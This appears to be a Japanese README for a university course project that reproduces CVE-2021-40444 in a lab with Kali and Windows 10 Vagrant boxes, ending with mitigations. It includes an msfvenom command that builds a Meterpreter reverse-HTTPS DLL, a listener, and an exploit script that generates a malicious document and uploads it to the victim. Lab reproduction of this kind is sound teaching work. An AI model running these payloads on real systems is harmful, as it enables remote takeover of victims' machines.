TIC4301_Project
TIC4301 プロジェクト - CVE-2021-40444
以下のvagrantボックスをダウンロードしてください:
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
以下のコマンドでvagrantを通じてボックスをインポートしてください:
- vagrant box add kali_package.box
- vagrant box add victim_package.box
- vagrant init kali_package.box
- vagrant init victim_package.box
- vagrant up
セットアップ (win10):
- win10ボックスで、パスワードvagrantを使用して管理者としてログインします。
- デスクトップのscript.ps1を右クリックし、PowerShellで実行します。(開いたままにしておく)
- ipconfig.exeを実行し、このホストのアドレスを取得します。
セットアップ (Kali):
- cd Desktop/CVE-2021-40444.
- msfvenomで悪意のあるDLLを生成します。 # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
- metasploitでリスナーを起動します。
- 悪意のあるドキュメントを生成します。 # python3 exploit.py generate test/calc.dll http://
- http://<win 10 IP>/upload にアクセスし、ファイルをアップロードします。
- シェルを待ち受けます。
緩和策:
- KB5005565 ホットフィックスをインストールします。
- リポジトリ内のpatch.regを使用してWindowsレジストリを編集します。